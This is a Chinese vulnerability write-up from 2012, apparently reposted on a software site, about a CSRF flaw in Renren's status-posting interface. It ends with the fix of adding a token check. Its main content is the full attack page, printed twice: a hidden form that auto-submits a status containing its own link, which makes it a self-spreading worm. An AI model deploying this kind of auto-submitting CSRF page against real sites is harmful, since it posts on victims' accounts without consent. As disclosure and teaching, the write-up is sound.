人人网CSRF漏洞曝光及修复方案
发布时间:2012-05-17 10:30:10 作者:佚名 
我要评论
我要评论CSRF(Cross-site request forgery跨站请求伪造,也被称成为“one click attack”或者session riding,通常缩写为CSRF或者XSRF,是一种对网站的恶意利用。尽管听起来像跨站脚本(XSS),但它与XSS非常不同,并且攻击方式几乎相左。XSS利用站点内的信任用户,而CSRF则通
脚本页面http://bookman.sinaapp.com/doover.php,访问该页面后会发送一条状态“已经结束了,这是我的自白,想明白原理的看我日志就好。http://bookman.sinaapp.com/doover.php”
详细说明:
看了下那个链接的源代码,是通过人人逛街的接口提交的。
接口地址http://j.renren.com/publisher/status,只要POST一个参数content到接口即可。
这个页面post的content内容就是“已经结束了,这是我的自白XXXX”。
<html>
<head>
<meta http-equiv="Content-Type" content="text/html; charset=UTF-8" />
<title>爱你的说</title>
</head>
<body>
<iframe name="destination" width="0" height="0"></iframe>
数字bookman爱你。欢迎访问“肖寒Bookman”的人人空间。
<div id="kokia" style="float:left;display:none;">
<form id="akiko" name="akiko" action="http://j.renren.com/publisher/status" method="POST" target="destination">
<input type="text" name="synsbcp" www.jb51.net value="1"/>
<p>raw: <input type="text" name="content" value="已经结束了,这是我的自白,想明白原理的看我日志就好。http://bookman.sinaapp.com/doover.php"/></p>
<input type="submit" value="Submit" />
</form>
</div>
<script>
document.akiko.submit();
</script>
</body>
</html>
修复方案:
人人比我懂的多。以前有次flash的类似的,传播是站内信吧。
补漏洞很简单,加一个token验证即可。
低级错误一枚,从网不行啊。
作者 leo108 AND 白熊一枚
详细说明:
看了下那个链接的源代码,是通过人人逛街的接口提交的。
接口地址http://j.renren.com/publisher/status,只要POST一个参数content到接口即可。
这个页面post的content内容就是“已经结束了,这是我的自白XXXX”。
<html>
<head>
<meta http-equiv="Content-Type" content="text/html; charset=UTF-8" />
<title>爱你的说</title>
</head>
<body>
<iframe name="destination" width="0" height="0"></iframe>
数字bookman爱你。欢迎访问“肖寒Bookman”的人人空间。
<div id="kokia" style="float:left;display:none;">
<form id="akiko" name="akiko" action="http://j.renren.com/publisher/status" method="POST" target="destination">
<input type="text" name="synsbcp" www.jb51.net value="1"/>
<p>raw: <input type="text" name="content" value="已经结束了,这是我的自白,想明白原理的看我日志就好。http://bookman.sinaapp.com/doover.php"/></p>
<input type="submit" value="Submit" />
</form>
</div>
<script>
document.akiko.submit();
</script>
</body>
</html>
修复方案:
人人比我懂的多。以前有次flash的类似的,传播是站内信吧。
补漏洞很简单,加一个token验证即可。
低级错误一枚,从网不行啊。
作者 leo108 AND 白熊一枚
相关文章
人人网是一款是基于人人网主体服务的免费应用软件,专门为手机用户设计。2013-11-26- 乐划锁屏app是一款oppo壁纸锁屏软件,主要为用户提供了超多强大的智能锁屏工具,界面很清爽,内容丰富的壁纸资源,各种精致的锁屏,以及可互动的动态壁纸2025-09-04
- sololearn官方版是主打编程代码学习相关功能的软件,sololearn汉化版让你可以更好完成最新的编程代码学习,专业的软件库给你带来更好的帮助,轻松的解决学习需求,更好的提2025-11-27
- HSE365在线教育平台app是由北京艾普数智科技有限公司开发的一款一站式数字化安全管理服务平台,app基于“互联网+安全生产”的先进思维和技术,旨在实现“让安全成为一种习2026-03-26
- Wordpress写个人博客的朋友越来越多同时想把写的博客文章同步到其他的社交网站上,比如人人网,接下来为大家介绍一招,感兴趣的你可以参考下哈,或许可以帮助到你2013-03-11
人人网奥运屏蔽 关键词 可以屏蔽奥运相关的关键词 不喜欢奥运的人有福
不喜欢奥运的人可以用这个软件2012-08-07
人人桌面经典版客户端是人人网推出的官方桌面版客户端,是人人网的官方增强软件。人人桌面经典版是官方提供的,适合习惯使用旧版的网友2014-07-02- 人人网简称人人,它让您更加方便的随时随地的与好友自由沟通。 在沟通的过程中,各位人人网友可千万别忘了作息时间哦,下面小编就教你开启打扰模式设置2014-08-02
- 人人网是一款很好用的社交平台软件,我们在使用人人沟通聊天时,如何屏蔽陌生人的消息呢?下面随小编一起来看下人人屏蔽陌生人消息的具体操作吧。希望此篇教程能对大家有所2014-08-02
- 我们在使用人人沟通聊天时,如何屏蔽陌生人的消息呢?这是目前很多的人喜欢问的问题,本文带来了详细的教程2014-08-04
最新评论